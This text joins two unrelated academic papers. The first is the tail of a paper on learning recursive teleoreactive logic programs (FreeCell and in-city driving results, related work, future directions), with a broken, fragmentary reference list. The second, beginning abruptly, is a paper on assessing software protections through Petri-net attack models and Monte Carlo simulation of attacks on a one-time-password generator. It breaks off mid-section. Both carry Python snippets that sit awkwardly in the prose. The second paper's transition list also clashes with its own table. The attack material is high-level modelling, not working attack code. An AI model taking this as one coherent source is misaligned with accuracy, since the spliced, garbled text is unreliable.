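        return True
    top = column[-1]
    return top[0] == card[0] + 1 and color(top) != color(card)

def can_move_to_home(card, home_pile):
    """Home cells build up by suit in ascending order from the ace."""
    if not home_pile:
        return card[0] == 1
    top = home_pile[-1]
    return card[1] == top[1] and card[0] == top[0] + 1

def can_move_to_free_cell(card, cell):
    """A free cell holds at most one card."""
    return cell is None
```

For example, a red five may be placed on a black six but not on a red six, and only an ace may start a home pile.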
In the learning condition, the system rapidly acquired recursive FreeCell programs that considerably reduced the influence of task difficulty as compared to the nonlearning version. As before, the benefits are reflected both in the number of cycles needed to solve problems and in the CPU time. However, increasing the number of cards in this domain can alter the structure of solutions, so the learning system continued to invoke means-ends problem solving in later portions of the curve. For instance, situations with 20 cards often require column-to-column moves that do not appear in simpler tasks, which caused comparable behavior in the two conditions at this complexity level. However, the learning system took advantage of this experience to handle 24-card problems with much less effort. Learning also increased the probability of solution (about 80 percent) over the nonlearning version (around 50 percent) on these tasks.

5.3 In-City Driving

The in-city driving domain involves a medium-fidelity simulation of a downtown driving environment. The city has several square blocks with buildings and sidewalks, street segments, and intersections. Each street segment includes a yellow center line and white dotted lane lines, and it has its own speed limit that the agent should observe. Buildings on each block have unique addresses, which help the agent navigate through the city and allow specific tasks like package deliveries. A typical city configuration we used has nine blocks, bounded by four vertical streets and four horizontal streets with four lanes each. For this domain, we provided the system with 41 concepts and 19 primitive skills.

Figure 5: The total number of cycles required to solve a particular right-turn task, along with the planning and execution times, as a function of the number of trials. Each learning curve shows the mean computed over ten sets of trials and 95 percent confidence intervals.
With the basic knowledge, the agent can describe its current situation at multiple levels of abstraction and perform actions for accelerating, decelerating, and steering left or right at realistic angles. Thus, it can operate a vehicle, but driving safely in a city environment is a totally different story. The agent must still learn how to stay aligned and centered within lane lines, change lanes, increase or decrease speed for turns, and stop for parking. To encourage such learning, we provided the agent with the task of moving to a destination on a different street segment that requires a right turn. To achieve this task, it resorted to problem solving, which found a solution path that involved changing to the rightmost lane, staying aligned and centered until the intersection, steering right to place the car in the target segment, and finally aligning and centering in the new lane. We recorded the total number of cycles to solve this task, along with its breakdown into the cycles devoted to planning and to execution, as a function of the number of trials. Figure 5 shows the learning curve that results from averaging over ten different sets of trials. As the system accumulates knowledge about the driving task, its planning effort effectively disappears, which leads to an overall reduction in total cycles, even though the execution cycles increase slightly. The latter occurs because the vehicle happens to be moving in the right direction at the outset, which accidentally brings it closer to the goal while the system is engaged in problem solving. After learning, the agent takes the same actions intentionally, which produces the increase in execution cycles. We should note that this task is dominated by driving time, which places a lower bound on the benefits of learning even when behavior becomes fully automatized.

Table 9: Recursive skill clauses learned for the in-city driving domain.
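The clauses in Table 9 include recursive references, both direct and indirect, and such structure can be checked mechanically. In the sketch below, the skill names and call structure only loosely paraphrase the driving clauses and are our own illustrative assumptions.

```python
def reachable(skill, program, seen=None):
    """Return the set of skill names reachable from `skill` through the
    bodies of a (hypothetical) skill program, given as a map from each
    skill head to the list of subskills its body invokes."""
    if seen is None:
        seen = set()
    for sub in program.get(skill, []):
        if sub not in seen:
            seen.add(sub)
            reachable(sub, program, seen)
    return seen

def is_recursive(skill, program):
    """A skill is recursive if it can reach itself, directly or not."""
    return skill in reachable(skill, program)

# Illustrative program with one direct and one indirect recursion.
driving = {
    'driving-in-segment': ['in-rightmost-lane', 'in-lane'],
    'in-rightmost-lane': ['in-segment'],
    'in-segment': ['in-intersection-for-right-turn', 'driving-in-segment'],
    'in-intersection-for-right-turn': ['in-intersection-for-right-turn'],
}
```

Here `in-intersection-for-right-turn` is directly recursive, while `driving-in-segment` reaches itself indirectly through `in-rightmost-lane` and `in-segment`.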
We also inspected the skills that the architecture learned for this domain. Table 9 shows the five clauses it acquires by the end of a typical training run. These structures include two recursive references, one in which in-intersection-for-right-turn invokes itself directly, but also a more interesting one in which driving-in-segment calls itself indirectly through in-segment, in-intersection-for-right-turn, and in-rightmost-lane. Testing this teleoreactive logic program on streets with more lanes than occur in the training task suggests that it generalizes correctly to these situations.

6. Related Research

The basic framework we have reported in this paper incorporates ideas from a number of traditions. Our representation and organization of knowledge draws directly from the paradigm of logic programming (Clocksin & Mellish, 1981), whereas its utilization in a recognize-act cycle has more in common with production-system architectures (Neches, Langley, & Klahr, 1987). The reliance on heuristic search to resolve goal-driven impasses, coupled with the caching of generalized solutions, comes closest to the performance and learning methods used in problem-solving architectures like Soar (Laird, Rosenbloom, & Newell, 1986) and PRODIGY (Minton, 1990). Finally, we have already noted our debt to Nilsson (1994) for the notion of a teleoreactive system. However, our approach differs from earlier methods for improving the efficiency of problem solvers in the nature of the acquired knowledge. In contrast to Soar and PRODIGY, which create flat control rules, our framework constructs hierarchical logic programs that incorporate nonterminal symbols. Methods for learning macro-operators (e.g., Iba, 1988; Mooney, 1989) have a similar flavor, in that they explicitly specify the order in which to apply operators, but they do not typically support recursive references.
Shavlik (1989) reports a system that learns recursive macro-operators but that, like other work in this area, does not acquire reactive controllers. Moreover, both traditions have used sophisticated analytical methods that rely on goal regression to collect conditions on control rules or macro-operators, nonincremental empirical techniques like inductive logic programming, or combinations of such methods (e.g., Estlin & Mooney, 1997). Instead, goal-driven composition transforms traces of successful means-ends search directly into teleoreactive logic programs, determining their preconditions by a simple method that involves neither analysis nor induction, as normally defined, and that operates in an incremental and cumulative fashion. Previous research on learning for reactive execution, like work on search control, has emphasized unstructured knowledge. For example, Benson's (1995) TRAIL acquires teleoreactive control programs for use in physical environments, but it utilizes inductive logic programming to determine local rules for individual actions rather than hierarchical structures. Fern et al. (2004) report an approach to learning reactive controllers that trains itself on increasingly complex problems, but that also acquires decision lists for action selection. Khardon (1999) describes another method for learning ordered, but otherwise unstructured, control rules from observed problem solutions. Our approach shares some features with research on inductive programming, which focuses on synthesizing iterative or recursive programs from input-output examples. For instance, Schmid's (2005) IPAL generates an initial program from the results of problem solving by replacing constants with constructive expressions and variables, then transforms it into a recursive program through inductive inference steps.
Olsson's (1995) ADATE also generates recursive programs through program refinement transformations, but carries out an iterative deepening search guided by criteria like fit to training examples and syntactic complexity. Schmid's work comes closer to our own, in that both operate over problem-solving traces and generate recursive programs, but our method produces these structures directly, rather than using explicit transformation or revision steps. Perhaps the closest relative to our approach is Reddy and Tadepalli's (1997) X-Learn, which acquires goal-decomposition rules from a sequence of training problems. Their system does not include an execution engine, but it generates recursive hierarchical plans in a cumulative manner that also identifies declarative goals with the heads of learned clauses. However, because it invokes forward-chaining rather than backward-chaining search to solve new problems, it relies on the trainer to determine program structure. X-Learn also uses a sophisticated mixture of analytical and relational techniques to determine conditions, rather than our much simpler method. Ruby and Kibler's (1991) SteppingStone has a similar flavor, in that it learns generalized decompositions through a mixture of problem reduction and forward-chaining search. Marsella and Schmidt's (1993) system also acquires task-decomposition rules by combining forward and backward search to hypothesize state pairs, which in turn produce rules that it revises after further experience. Finally, we should mention another research paradigm that deals with speeding up the execution of logic programs. One example comes from Zelle and Mooney (1993), who report a system that combines ideas from explanation-based learning and inductive logic programming to infer the conditions under which clauses should be considered.
Work in this area starts and ends with standard logic programs, whereas our system transforms a weak problem-solving method into an efficient program for reactive control. In summary, although our learning technique incorporates ideas from earlier frameworks, it remains distinct on a number of dimensions.

7. Directions for Future Research

Despite the promise of this new approach to representing, utilizing, and learning knowledge for teleoreactive control, our work remains in its early stages. Future research should demonstrate the acquisition of complex skills on additional domains. These should include both classical domains like logistics planning and dynamic settings like in-city driving. We have reported preliminary results on the latter, but our work in this domain to date has dealt with relatively simple skills, such as changing lanes and slowing down to park. Humans' driving knowledge is far more complex, and we should demonstrate that our methods are sufficient to acquire many more of these skills. Note that, although driving involves reactive control, it also benefits from route planning and other high-level activities. Recall that our definition of teleoreactive logic programs, and our method for learning them, guarantees only that a skill will achieve its associated goal if it executes successfully, not that such execution is possible. For such guarantees, we must augment the current execution module with some lookahead ability, as Nau et al. (1999) have already done for hierarchical task networks. This will require additional effort from the agent, but still far less than solving a problem with means-ends analysis. Another response would use inductive logic programming or related methods to learn additional conditions on skill clauses that ensure they will achieve their goal, even without lookahead.
To this end, we can transform the results of lookahead search into positive and negative instances of clauses, based on whether they would lead to success, much as in early work on inducing search-control rules from solution paths (Sleeman et al., 1982). Even if such conditions are incomplete, they should still reduce the planning effort required to ensure the agent's actions will produce the desired outcome. Another important limitation concerns our assumption that the agent always executes a skill to achieve a desired situation. The ability to express less goal-directed activities, such as playing a piano piece, is precisely what distinguishes hierarchical task networks from classical planning (Erol, Hendler, & Nau, 1994). We hope to extend our framework in this direction by generalizing its notion of goals to include concepts that describe sets of situations that hold during certain time intervals. To support hierarchical skill acquisition, this augmented representation will require extensions to both the problem solving and learning mechanisms. In addition, we should extend our framework to handle skill learning in nonserializable domains, such as tile-sliding puzzles, which motivated much of the early research on macro-operator formation (e.g., Iba, 1988). Future work should also address a related form of overgeneralization we have observed on the Tower of Hanoi puzzle. In this domain, the approach learns reasonable hierarchical skills that can solve the task without problem solving, but that only do so about half the time. In other runs, the learned skills attempt to move the smallest disk to the wrong peg, which ultimately causes the system to fail. Humans often make similar errors but also learn to avoid them with experience. Inspection of the behavioral trace suggests this happens because one learned skill clause includes variables that are not mentioned in the head but are bound in the body.
We believe that including contextual conditions about variables bound higher in the skill hierarchy will remove this nondeterminism and produce more correct behavior. In addition, recall that the current system does not chain backward from the start condition of learned skill clauses. We believe that cases will arise in which such chaining, even if not strictly necessary, will make the acquisition of complex skills much easier. Extending the problem solver to support this ability means defining new conceptual predicates that the agent can use to characterize situations in which its learned skills are applicable. This will be straightforward for some domains and tasks, but some recursive skills will need recursively defined start concepts, which requires a new learning mechanism. Augmenting the system in this manner may also lead to a utility problem (Minton, 1990), not during execution of learned teleoreactive logic programs but during the problem solving used for their acquisition, which we would then need to overcome. Finally, we should note that, although our approach learns recursive logic programs that generalize to different numbers of objects, its treatment of goals is less flexible. For example, it can acquire a general program for clearing a block that does not depend on the number of other objects involved, but it cannot learn a program for constructing a tower with arbitrarily specified components. Extending the system's ability to transfer across different goals, including ones that are defined recursively, is another important direction for future research on learning hierarchical skills.

8. Concluding Remarks

In the preceding pages, we proposed a new representation of knowledge—teleoreactive logic programs—and described how they can be executed over time to control physical agents.
In addition, we explained how a means-ends problem solver can use them to solve novel tasks and, more important, transform the traces of problem solutions into new clauses that can be executed efficiently. The responsible learning method—goal-driven composition—acquires recursive, executable skills in an incremental and cumulative manner. We reported experiments that demonstrated the method's ability to acquire hierarchical and recursive skills for three domains, along with its capacity to transfer its learned structures to tasks with more objects than seen during training. Teleoreactive logic programs incorporate ideas from a number of traditions, including logic programming, adaptive control, and hierarchical task networks, in a manner that supports reactive but goal-directed behavior. The approach which we have described for acquiring such programs, and which we have incorporated into the ICARUS architecture, borrows intuitions from earlier work on learning through problem solving, but its details rely on a new mechanism that bears little resemblance to previous techniques. Our work on learning teleoreactive logic programs is still in its early stages, but it appears to provide a novel and promising path to the acquisition of effective control systems through a combination of reasoning and experience.

Acknowledgements

This material is based on research sponsored by DARPA under agreement numbers HR0011-04-1-0008 and FA8750-05-2-0283 and by Grant IIS-0335353 from the National Science Foundation. The U. S. Government is authorized to reproduce and distribute reprints for Governmental purposes notwithstanding any copyright notation thereon. Discussions with Nima Asgharbeigy, Kirstin Cummings, Glenn Iba, Negin Nejati, David Nicholas, Seth Rogers, and Stephanie Sage contributed to the ideas we have presented in this paper.

References

International Conference on Machine Learning (pp. 47–54). San Francisco: Morgan Kaufmann.
persistent reactive behavior.
Proceedings of the Third International Joint Conference on
Proceedings of the Fifteenth International Conference on Inductive Logic Programming (pp. 51–68). Bonn, Germany: Springer-Verlag.
Proceedings of the Twelfth National Conference on Artificial Intelligence (pp. 1123–1128). Seattle: MIT Press.
of planning. Proceedings of the Fifteenth International Joint Conference on Artificial Intelligence (pp. 1227–1232). Nagoya, Japan.
Fern, A., Yoon, S. W., & Givan, R. (2004). Learning domain-specific control knowledge from random walks. Proceedings of the Fourteenth International Conference on Automated
solving. Computational Intelligence.
Khardon, R. (1999). Learning action strategies for planning domains. Artificial Intelligence, 113, 125–148.
a general learning mechanism. Machine Learning, 1, 11–46.
Attack Simulation based Software Protection Assessment Method Gaofeng Zhang, Paolo Falcarin, Elena Gómez-Martinez, Shareeful Islam University of East London, London, UK {g.zhang, falcarin, e.gomez, s.islam}@uel.ac.uk Christophe Tartary Saarland University, Saarbrücken, Germany christophe_tartary@icloud.com Bjorn De Sutter Ghent University, Ghent, Belgium bjorn.desutter@ugent.be Jérôme d'Annoville Gemalto, Meudon, France jerome.d-annoville@gemalto.com Abstract—Software protection is an essential aspect of information security: it withstands malicious activities on software and protects software assets. However, software developers still lack a methodology for assessing the protections they deploy. To address this gap, we present a novel attack simulation based software protection assessment method to assess and compare various protection solutions. Our solution relies on Petri Nets to specify and visualize attack models, and we developed a Monte Carlo based approach to simulate attacking processes and to deal with uncertainty. Then, based on this simulation and estimation, a novel protection comparison model is proposed to compare different protection solutions. Lastly, our attack simulation based software protection assessment method is presented. We illustrate our method by means of a software protection assessment process to demonstrate that our approach can provide a suitable software protection assessment for developers and software companies. Keywords—Software Security; Software Protection Assessment; Attack Simulation; Monte Carlo Method; Petri Net I. INTRODUCTION Currently, software is an extremely important asset for customers to support and execute their businesses. Consequently, software protection has attracted much attention from developers and software companies in terms of software security.
To ensure security against malicious software attacks, many tools have been developed, such as data obfuscation, tamper-proofing, code splitting, software watermarking, and others [13]. In this regard, assessing the effectiveness of these protections is crucial before embedding them into real commercial products. In particular, in practical use cases, like mobile computing, multiple protection methods could be utilised together as Protection Solutions (PSs) to thwart actual threats. Therefore, a software protection assessment method needs to be able to assess potential PSs with respect to various types of attacks. This is the context where this paper takes place. Currently, one main type of software protection assessment [15] focuses on the assessment of individual protection methods and does not consider PSs with multiple protection methods. Another kind of software protection assessment [14] discussed general software measurement frameworks for protection, and did not involve PSs either. Hence, neither of these approaches is suitable for protection assessment in terms of complicated PSs able to provide convincing results. Besides, for real software attack processes, uncertainty is another challenge for these existing assessment methods. In uncertain software attacking processes, there are many random variables and factors at play, such as the computing resources for attacking, the decisions or selections made by specific attackers, and so on. Moreover, specific environments, like mobile computing, can amplify this uncertainty through the fragmentation of mobile OSs. To capture this phenomenon, we could use a non-deterministic attack simulation based on the Monte Carlo method to describe the real uncertain software attacking processes. This idea will be the basic tool for our proposed method.
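As a minimal sketch of this idea, the following Monte Carlo loop estimates the expected attacker effort along a linear sequence of attack steps. The step names, per-attempt success probabilities, and effort measure are illustrative assumptions of ours, not values or models from the paper.

```python
import random

def simulate_attack(steps, success_probs, trials=10000, seed=0):
    """Monte Carlo sketch: each attack step along a linear path succeeds
    with some probability per attempt; estimate the mean total number of
    attempts needed to traverse the whole path. With independent steps,
    the expectation is the sum of 1/p over the steps (geometric means)."""
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        attempts = 0
        for step in steps:
            p = success_probs[step]
            while True:                 # retry the step until it succeeds
                attempts += 1
                if rng.random() < p:
                    break
        total += attempts
    return total / trials
```

For two hypothetical steps with success probabilities 0.5 and 0.25, the estimate converges toward 1/0.5 + 1/0.25 = 6 attempts; richer PN-based models would add branching, concurrency, and protection-dependent probabilities.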
Petri Net (PN) based attack models are suitable for modelling software attacks [8, 10], and in this work we use them to support software protection assessment by means of Monte Carlo based attack simulation. In real software protection implementations, assessing every possible PS in each specific software protection situation is a huge task, considering the myriad of possible combinations of PSs (multiple protection methods with their parameters) and software protection situations (multiple attacks with weights). Hence, the relations (comparison results) among PSs under protection assessment are particularly valuable. Our assessment method uses a comparison model to manage the comparisons among PSs on the basis of the attack simulation. As such, the protection comparison model is the central component of our assessment methodology. To summarize our approach: our novel Attack Simulation based Software Protection Assessment Method (ASSPAM) uses a Monte Carlo based Attack Simulation (MCAS) to simulate specific software attack processes with PSs applied, based on PN based attack models. Then, using the results obtained from the MCAS, our Attack Simulation based Protection Comparison Model (ASPCM) provides a numeric estimation of each PS, which ASSPAM uses to compare PSs and search for the best one. The main contributions of this paper include: 1) a Monte Carlo based attack simulation for protection assessment; 2) a novel attack simulation based protection comparison model to compare PSs with numeric confidences; 3) a novel attack simulation based software protection assessment method to run the assessment. This research has been carried out within the European FP7 project ASPIRE, Advanced Software Protection: Integration, Research, and Exploitation [1]. Our method focuses on the assessment of PSs and does not cover the generation and optimisation of these PSs.
Other components of ASPIRE store security experts' knowledge and experience in a Knowledge Base and generate PSs by means of reasoning techniques. Besides, generating and optimising PSs involves aspects, such as the cost of protections and the dependencies among protection methods, that are out of the scope of this paper. Furthermore, compared to traditional PNs [8], our PN based attack models focus on attack steps (transitions) with related simulation information. Therefore, some features of traditional PNs, such as tokens and liveness, are not involved in this paper. PNs with their full characteristics will be utilised by other software protection assessment approaches in the ASPIRE project. The paper is organized as follows. Section II describes related work. Section III discusses preliminary concepts and background. In Section IV, our new method is proposed. In Section V, we use a protection assessment instance to demonstrate that our proposed method can provide suitable protection assessments. Section VI concludes this paper and points out future work.

II. RELATED WORK

This section introduces existing research in the areas of software analysis and measurement, attack modelling, Monte Carlo simulation, and software protection assessment.

A. Software Analysis and Measurement

Software analysis and measurement are important areas in software engineering [2]. For example, in the software process improvement area, measurement has been emphasised as a central function and activity [3]. From a software security viewpoint, Tonella et al. [4] presented a general framework to assess software by various measurable features and metrics to withstand software attacks. Related software analysis and measurement mechanisms are valuable references for our software protection assessment.

B. Attack Modelling

Currently, attack modelling is an important area of information security.
Attack Tree models and Attack Graphs are widely used for representing network attacks, virus attacks, and so on [5, 6]. For example, a scalable modelling process for attack graph generation with logic formalism is studied in [7]. However, none of them can properly describe preconditions, actions and external impacts in software attack processes. In this regard, Petri Nets (PNs) were originally introduced as a modelling technique for concurrent systems [8]. These nets can model specific cyber-physical attacks on smart grids [9]. With software protection as the objective, Wang et al. [10] focused on coloured PN based attack modelling. As discussed in Section I, PN based attack models are suitable to describe preconditions, post-conditions and actions and, therefore, they play a core role in our attack modelling and protection assessment.

C. Monte Carlo Simulation

The Monte Carlo simulation (method) is a powerful tool for dealing with uncertainty and probability [11]. It is very useful for analysing and simulating complex systems and problems, due to its flexibility and error-quantifiable features [12]. Hence, the Monte Carlo method is a suitable technique to simulate complex systems with multiple random variables. As discussed in Section I, in this paper we assess various PSs in real uncertain attack processes to provide suitable PSs for developers and software companies. With the help of the Monte Carlo method, we can use attack simulation to support the ASSPAM when assessing protections.

D. Software Protection Assessment

As previously discussed, software protection assessment is an essential part of software protection [13]. Basile et al. [14] described a unified high-level software attack model to assess software protections for developers. Experiments have been designed to assess the effectiveness and efficiency of related software protection techniques for code obfuscation [15, 18, 19].
Existing protection assessment methods are either too specialised or too general to cope with uncertain software attack processes and PSs. To overcome this issue, our ASSPAM relies on PN based attack models and Monte Carlo based attack simulations.

III. PETRI NET BASED ATTACK MODEL

In this section, we discuss the PN based attack model for attack simulation, which is the basic supporting tool of our ASSPAM, especially for our MCAS.

A. Petri Net based Software Attack Modelling

PN based attack models are the essential rationale for the assessment method in this paper. Generally speaking, PN based attack models represent all possible attack paths and attack steps in software attacks, and support the attack simulations on these attacks via some extra information. Based on existing work [8, 10], we present our model to describe software attacks for protection assessment:

Definition 1 (PSAM): A PN based Software Attack Model for simulation is a five-tuple PSAM = (P, T, A, EC, AE), where:

- P is a finite set of states, represented by circles. These states model sub-goals reached by an attacker after having executed a number of attack steps. P = {P_0, ..., P_n}.
- T is a finite set of transitions, represented by rectangles. These transitions model attack steps, i.e., specific actions undertaken by attackers to reach a sub-goal on a path to the final end goal of their attack. T = {T_0, ..., T_m}.
- P ∪ T ≠ ∅, P ∩ T = ∅.
- A ⊆ (T × P) ∪ (P × T) is a multi-set of directed arcs, relating sub-goals and attack steps. A = {a_0, ..., a_m}.
- EC represents the Effort Consumption. It is a finite set of the attacker's effort consumed at each transition in T, EC = {ec_0, ..., ec_m}. It is utilised in the preconditions of transitions.
- AE represents the Attacker Effort. It is a finite set of the attacker's effort at each state in P, AE = {ae_0, ..., ae_n}.

Attackers have a capability, including resources and skills, to execute attacks on protected or unprotected software. This capability is represented by AE and is consumed in the transitions of attack processes via EC during attack simulations. EC and AE, the key elements supporting the attack simulations for protection assessment, are discussed further in the next subsection. As an example of a relevant use case, Figure 1 and Table 1 present relevant attack paths on a One-Time Password (OTP) generator [16] by means of a PSAM: P0 is the starting state, in which attackers start to attack the OTP software, and P10 is the final state, which represents a successful attack. Specifically, this success means that attackers obtain the seed of the OTP generator. P1 to P9 are nine intermediate states in the attack, corresponding to different sub-goals being reached. T0, T1, T2, T3, T4, T5, T6, T8, T9, T10, and T11 are eleven transitions, which describe various attack steps (actions) in attack processes, detailed in Table 1. Table 1.
Attack Table of the PN based attack model on a one-time password generator

<table>
<thead>
<tr>
<th>Transition</th>
<th>Description/Objective</th>
<th>Input</th>
<th>Output</th>
</tr>
</thead>
<tbody>
<tr><td>T0</td><td>Identify PIN section of the code</td><td>Original code</td><td>Piece of code containing PIN checking</td></tr>
<tr><td>T1</td><td>Bypass PIN check</td><td>Piece of code containing PIN checking</td><td></td></tr>
<tr><td>T2</td><td>Bypass PIN check</td><td>Piece of code containing PIN checking</td><td></td></tr>
<tr><td>T3</td><td>Set-up for parallel run</td><td>N/A</td><td></td></tr>
<tr><td>T4</td><td>Unlock provisioning phase</td><td>Original code</td><td></td></tr>
<tr><td>T5</td><td>Fake server setting</td><td>N/A</td><td></td></tr>
<tr><td>T6</td><td>AES decryption code identification</td><td>Fake server (P5) + Reusable provisioning code (P6)</td><td></td></tr>
<tr><td>T7</td><td>Seed recovery</td><td>AES decryption code + real server</td><td></td></tr>
<tr><td>T8</td><td>Code pruning for XOR localization</td><td>Original code</td><td></td></tr>
<tr><td>T9</td><td>XOR chains identification</td><td>Code fragments (P8)</td><td></td></tr>
<tr><td>T10</td><td>Seed recovery</td><td>Sequence of XOR operations</td><td></td></tr>
</tbody>
</table>

The PSAM is the basic supporting tool of this paper, providing attack models with attack paths and steps; the EC and AE parts are introduced in the next subsection to complete the model.

B. Effort Consumption and Attacker Effort

In this subsection, we detail the Effort Consumption (EC) and the Attacker Effort (AE), the parts of the PSAM that specifically support attack simulation for protection assessment. In this paper, we use uniform distributions to describe the Effort Consumption EC and its elements ec_i. For each ec_i, a maximum boundary Max_i and a minimum boundary Min_i determine this random variable through the uniform distribution in equation (1).
\[ EC = \{ec_0, \ldots, ec_i, \ldots, ec_m\}, \quad ec_i = f_{ec}(Min_i, Max_i), \quad i \in [0, m] \quad (1) \]

In equation (1), f_{ec}() represents sampling from the uniform distribution with the two boundaries Min_i and Max_i. For example, T0 in the OTP attack model is to "Identify the PIN check portion of the code". Both Max_i and Min_i can be set during attack modelling by users or by security experts in industry, based on real attack data. After that, ec_0 is a random variable with a uniform distribution between the two boundaries Max_0 and Min_0. Both boundaries can be increased when protections are applied: for example, when software protection methods increase the code size or the control-flow complexity, the T0 attack step becomes more difficult, which changes the uniform distribution of ec_0 via Max_0 and Min_0. These methods could be specific PSs that change ec_0. The relations between protection methods and transitions are decided by users, based on existing knowledge. In other words, the values Min_i and Max_i (and thus EC) depend on the chosen PS. The other component of the PSAM is AE, which represents the current effort of the attacker in each state of the attack process. AE is described by equation (2), in which ae_0 is the attacker effort before the attack process starts (in the initial place). In this paper, we set ae_0 as a random variable with a normal distribution.

\[ AE = \{ae_0, \ldots, ae_i, \ldots, ae_n\} \quad (2) \]

As introduced in Section I, since the attacker is a key part of the simulation, we use a normal distribution to represent real uncertain attack processes for one attacker. The PSAM is the basis of our method in this paper; the attack simulation, the protection comparison model and the protection assessment method all rely on it. In the next section, we introduce the main contribution of this paper: ASSPAM.

IV.
ATTACK SIMULATION BASED SOFTWARE PROTECTION ASSESSMENT METHOD

Based on the previous discussions, we introduce our novel ASSPAM in three steps: firstly, the MCAS simulates attack processes with PSs, based on the PN based attack models described in Section III; secondly, we introduce our ASPCM to compare different PSs based on these attack simulations; lastly, ASSPAM is introduced on top of MCAS and ASPCM to provide suitable PSs as the protection assessment results.

A. Monte Carlo based Attack Simulation

Monte Carlo based Attack Simulation (MCAS) consists of two parts: the Single Attack Process Simulation (SAPS) and the Monte Carlo method. They are introduced in the following.

1) Single Attack Process Simulation

The main process of the Single Attack Process Simulation (SAPS) works as follows: in one PSAM (a Directed Acyclic Graph), one attacker tries to move from the starting state to the final state. If he/she succeeds, the result of this SAPS is TRUE; otherwise, it is FALSE. It can be viewed as a route searching process in the directed acyclic graph. In SAPS, at each transition, we use the Passing Probability (PP) to control the probability that the attacker completes this transition (attack step) and reaches the next state. Passing Probability (PP): a finite set with one value per transition in T, pp_i ∈ PP, i ∈ [0, m].

\[ pp_i = \begin{cases} 0, & ae_{CUR} < ec_i \\ \tanh{(ae_{CUR}/ec_i - 1)}, & ae_{CUR} \geq ec_i \end{cases}, \quad i \in [0, m] \quad (3) \]

In equation (3), ec_i comes from equation (1) and is the effort consumption of the attack step, while ae_{CUR} comes from equation (2) and is the current attacker effort in one attack simulation process. If ae_{CUR} is smaller than ec_i, the probability is zero, which means that the current attacker effort is too low to complete this attack step.
Otherwise, if ae_{CUR} is not smaller than ec_i, the passing probability is required to be monotonically increasing and within [0, 1) for x in [0, +∞). To match this, we use the hyperbolic tangent function:

\[ \tanh(x) = (1 - e^{-2x})/(1 + e^{-2x}) \]

Besides the pre-conditions of transitions (PP), the actions of transitions change AE and the current state.

\[ ae_{NEW} = \begin{cases} ae_{CUR} - ec_i, & \text{with probability } pp_i \\ ae_{CUR}, & \text{with probability } 1 - pp_i \end{cases} \quad (4) \]

In equation (4), for transition T_i, with probability pp_i, ec_i is subtracted from ae_{CUR}, which means that the attacker passes this transition and arrives at the next state. Otherwise (i.e., with probability 1 - pp_i), the attacker has to go back to the previous state to find other paths towards the final state, and ae_{CUR} remains the same. Briefly, the SAPS is the basis of the Monte Carlo based attack simulation for protection assessment, modelling individual attack processes on a PSAM.

2) Monte Carlo based Attack Simulation

Based on this SAPS model, we use the Monte Carlo method to manage the SAPS and to provide a randomized simulator of attack-process success. The MCAS is illustrated in Figure 2. Its key component is the SAPS. To run the SAPS, we perform an initialisation phase that builds the underlying PN based attack model with EC and AE as introduced in Subsection III.B. The result of each SAPS is a Boolean. Then, the Monte Carlo method executes the SAPS multiple times. Finally, the simulation provides a probability of attack success (the ratio of SAPS runs returning TRUE among all runs). Besides, as introduced in Subsection III.B, a specific PS determines specific ECs in the PSAM. Hence, the result of one MCAS process is a probability of attack success for one PN based attack model and one PS.
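Under the definitions above, a simplified SAPS/MCAS loop might look like the following sketch. It reduces the PSAM to a single linear attack path (the paper's models are DAGs with backtracking), and all numeric parameters, the retry limit, and the zero-effort handling are our own illustrative assumptions:

```python
import math
import random

def sample_ec(lo, hi):
    """Draw one effort-consumption value: uniform in [lo, hi] (Eq. 1)."""
    return random.uniform(lo, hi)

def passing_probability(ae, ec):
    """Eq. 3: zero when the current attacker effort is below the step's
    consumption, otherwise tanh(ae/ec - 1), rising towards 1 as the
    effort surplus grows."""
    if ec <= 0:
        return 1.0          # NULL steps like T3 consume nothing (assumption)
    if ae < ec:
        return 0.0
    return math.tanh(ae / ec - 1.0)

def single_attack_process(steps, ae0_mean=200.0, ae0_std=5.0, max_tries=50):
    """One SAPS run over a linear attack path.

    steps: list of (min, max) effort-consumption bounds, one per transition.
    Returns True when the attacker reaches the final state."""
    ae = random.gauss(ae0_mean, ae0_std)   # initial attacker effort (Eq. 2)
    for lo, hi in steps:
        for _ in range(max_tries):         # retry a failed step a few times
            ec = sample_ec(lo, hi)
            pp = passing_probability(ae, ec)
            if pp == 0.0:
                return False               # effort too low: attack fails
            if random.random() < pp:
                ae -= ec                   # Eq. 4: consume effort, advance
                break
        else:
            return False                   # gave up on this step
    return True

def mcas(steps, rounds=20_000):
    """Monte Carlo based Attack Simulation: ratio of successful SAPS runs."""
    wins = sum(single_attack_process(steps) for _ in range(rounds))
    return wins / rounds
```

Raising the effort-consumption bounds of the steps (i.e., applying a stronger PS) lowers the probability of successful attack returned by `mcas`, which is exactly the signal the comparison model in the next subsection consumes.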
Figure 2. Monte Carlo based Attack Simulation (MCAS)

In brief, MCAS is the basic tool of ASPCM and ASSPAM.

B. Attack Simulation based Protection Comparison Model

We now present our ASPCM. As indicated in Section I, the main target of ASPCM is to compare PSs with numeric confidences by means of MCAS. To reach this aim, we introduce two such values: the Compare Confidence and the Neutral Confidence. From Subsection IV.A, a probability of attack success is the result of one MCAS process with one PN based attack model and one PS. If we compare two Protection Solutions, say PS-1 and PS-2, we can assume there are two probabilities p_1 and p_2 representing the results of MCAS runs executed with PS-1 and PS-2 respectively. To describe the confidence of the comparison, an intuitive way is to use the difference of these two probabilities, p_2 - p_1, for the assertion "PS-1 is better than PS-2" (a lower probability of successful attack means better protection). Besides, to complement this confidence, we consider the situation in which the two PSs cannot be distinguished, which covers two kinds of events: an attacker can break PS-2 and can also break PS-1; or an attacker cannot break PS-2 and cannot break PS-1 either. Therefore, the probability of these two events can be defined as p_1 × p_2 + (1 - p_1) × (1 - p_2), which yields equation (6). As such, our two confidences for the assertion "PS-1 is better than PS-2" are expressed by equations (5) and (6).

Compare Confidence (CC):

\[ CC = p_2 - p_1 \quad (5) \]

Neutral Confidence (NeuC):

\[ NeuC = 1 + 2 \times p_1 \times p_2 - p_1 - p_2 \quad (6) \]

Based on the results of MCAS (the probabilities of successful attack), the ASPCM performs comparisons via assertions ("PS-1 is better than PS-2", or "PS-2 is better than PS-1") together with the corresponding confidence values. Therefore, based on MCAS, the ASPCM can generate assertions with numeric confidences as the comparison results for various PSs. These results are used to generate the final protection assessment results of ASSPAM, introduced in the next subsection.

C. Attack Simulation based Software Protection Assessment Method

